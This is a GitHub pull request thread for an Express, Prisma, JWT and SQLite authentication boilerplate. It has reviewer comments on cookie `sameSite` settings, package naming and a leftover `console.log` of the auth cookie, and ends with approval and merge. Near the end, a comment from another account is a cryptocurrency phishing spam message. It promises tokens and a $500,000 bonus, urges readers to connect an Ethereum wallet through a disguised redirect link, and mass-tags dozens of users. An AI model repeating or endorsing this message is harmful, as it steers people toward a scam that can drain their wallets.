### PR TITLE
Auth using express, prisma, jwt, sqlite

### PR DESCRIPTION
**Pull request by Piipas**
- Express
- Prisma
- JWT
- SQLite

### CODE REVIEW

File: examples/rest-express-prisma-jwt-sqlite/README.md
Comment (smakosh) [inline examples/rest-express-prisma-jwt-sqlite/README.md:1]: Can you update this README?

File: examples/rest-express-prisma-jwt-sqlite/package.json [hunk 1]
```diff
@@ -0,0 +1,48 @@
+{
+    "name": "rest-express-prisma-sessions-sqlite",
```
Comment (smakosh) [inline examples/rest-express-prisma-jwt-sqlite/package.json:2]: Change name here to match folder name of this boilerplate

File: examples/rest-express-prisma-jwt-sqlite/package.json [hunk 2]
```diff
@@ -0,0 +1,48 @@
...
+        "dev": "prisma generate && ts-node ./src/server.ts",
+        "prisma:generate": "prisma generate",
+        "prisma:migrate": "prisma migrate dev",
+        "prisma:studio": "prisma studio"
+    },
+    "keywords": [],
+    "author": {
+        "name": "Smakosh",
+        "url": "https://smakosh.com"
+    },
```
Comment (smakosh) [inline examples/rest-express-prisma-jwt-sqlite/package.json:16]: Add your details here

File: examples/rest-express-prisma-jwt-sqlite/src/features/auth/controllers/loginHandler.ts [hunk 3]
```diff
@@ -0,0 +1,50 @@
...
+        process.env.JWT_REFRESH_SECRET!,
+        { expiresIn: process.env.JWT_REFRESH_EXPIRESIN }
+    );
+
+    res.cookie(process.env.REFRESH_TOKEN_COOKIE_NAME!, refresh_token, {
+        expires: new Date(
+            Date.now() + Number(process.env.REFRESH_TOKEN_COOKIE_EXPIRES)
+        ),
+        secure: true,
+        httpOnly: true,
```
Comment (smakosh) [inline examples/rest-express-prisma-jwt-sqlite/src/features/auth/controllers/loginHandler.ts:46]: Add `sameSite: "Lax"`

File: examples/rest-express-prisma-jwt-sqlite/src/features/auth/controllers/refreshHandler.ts [hunk 4]
```diff
@@ -0,0 +1,29 @@
...
+        process.env.JWT_REFRESH_SECRET!,
+        { expiresIn: process.env.JWT_REFRESH_EXPIRESIN }
+    );
+
+    res.cookie(process.env.REFRESH_TOKEN_COOKIE_NAME!, refresh_token, {
+        expires: new Date(
+            Date.now() + Number(process.env.REFRESH_TOKEN_COOKIE_EXPIRES)
+        ),
+        secure: true,
+        httpOnly: true,
```
Comment (smakosh) [inline examples/rest-express-prisma-jwt-sqlite/src/features/auth/controllers/refreshHandler.ts:25]: Add `sameSite: "Lax"`

File: examples/rest-express-prisma-jwt-sqlite/src/features/auth/controllers/signupHandler.ts [hunk 5]
```diff
@@ -0,0 +1,38 @@
...
+        process.env.JWT_REFRESH_SECRET!,
+        { expiresIn: process.env.JWT_REFRESH_EXPIRESIN }
+    );
+
+    res.cookie(process.env.REFRESH_TOKEN_COOKIE_NAME!, refresh_token, {
+        expires: new Date(
+            Date.now() + Number(process.env.REFRESH_TOKEN_COOKIE_EXPIRES)
+        ),
+        secure: true,
+        httpOnly: true,
```
Comment (smakosh) [inline examples/rest-express-prisma-jwt-sqlite/src/features/auth/controllers/signupHandler.ts:34]: Add `sameSite: "Lax"`

File: examples/rest-express-prisma-jwt-sqlite/src/features/auth/middlewares/passport.ts [hunk 6]
```diff
@@ -0,0 +1,40 @@
+import { JwtPayload } from "jsonwebtoken";
+import { Request } from "express";
+import {
+    Strategy,
+    ExtractJwt,
+    StrategyOptionsWithoutRequest,
+} from "passport-jwt";
+
+const fromCookie = (cookieName: string) => (req: Request) => {
+    console.log(req.cookies[cookieName]);
```
Comment (smakosh) [inline examples/rest-express-prisma-jwt-sqlite/src/features/auth/middlewares/passport.ts:10]: To be removed

**Review by smakosh — CHANGES_REQUESTED** [review]
Thanks for the PR, overall looks good, once the points raised are fixed, I will merge it!

**Review by smakosh — APPROVED** [review]
LGTM!

**Comment by smakosh** [comment]
@all-contributors please add @Piipas for code

**Comment by sobin007** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
formiganinja, @dantehemerson, @rmtnong, @aceboogie8519, @limkaleb, @belkizozkan, @mishkajul, @xavierca, @PeiXiaoMeng, @EM28715, @tdkr, @LoYeeee, @nesterone, @joshrieken, @damoncro, @ast850328, @windfall007, @lucadenhez, @garethnic, @Metoui24, @Punkte, @serendipity89, @fxghqc, @lyciumlee, @XHalso, @santihugin, @Dossi1, @casperhale, @yunbow, @thomascarvalho, @Lykhoyda, @randycml, @toomastahves, @derekr, @trojanshare, @shohan4556, @tommyliu9, @OC0311, @banerRana, @zeque98, @mike182uk, @zjffun, @MarkTangCd, @NorthHub, @laike, @AhmedAbdulrahman, @somestepan, @dennis-gonzales, @fqinhong, @liyuchenf1

**Pull request merged**